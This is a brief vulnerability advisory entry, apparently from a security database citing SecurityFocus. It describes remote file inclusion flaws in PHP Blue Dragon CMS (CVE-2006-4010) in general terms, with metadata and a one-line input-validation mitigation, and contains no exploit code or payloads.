Vendor: PHP Blue Dragon CMS
By: SecurityFocus
CVSS: 7.5 (HIGH)
Remote File Inclusion
CWE: 94
Product Name: PHP Blue Dragon CMS
Affected Version From: Not Specified
Affected Version To: Not Specified
Patch Exists: YES
Related CVE: CVE-2006-4010
CPE: a:php_blue_dragon:php_blue_dragon_cms
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Not Specified
2006
PHP Blue Dragon CMS Multiple Remote File Inclusion Vulnerabilities
PHP Blue Dragon CMS is prone to multiple remote file-include vulnerabilities because it fails to properly sanitize user-supplied input to the application. An attacker may leverage these issues to have an arbitrary remote file containing malicious script code execute in the context of the webserver process. This may allow the attacker to compromise the application and the underlying system.
Mitigation:
Input validation should be used to ensure that user-supplied input is properly sanitized.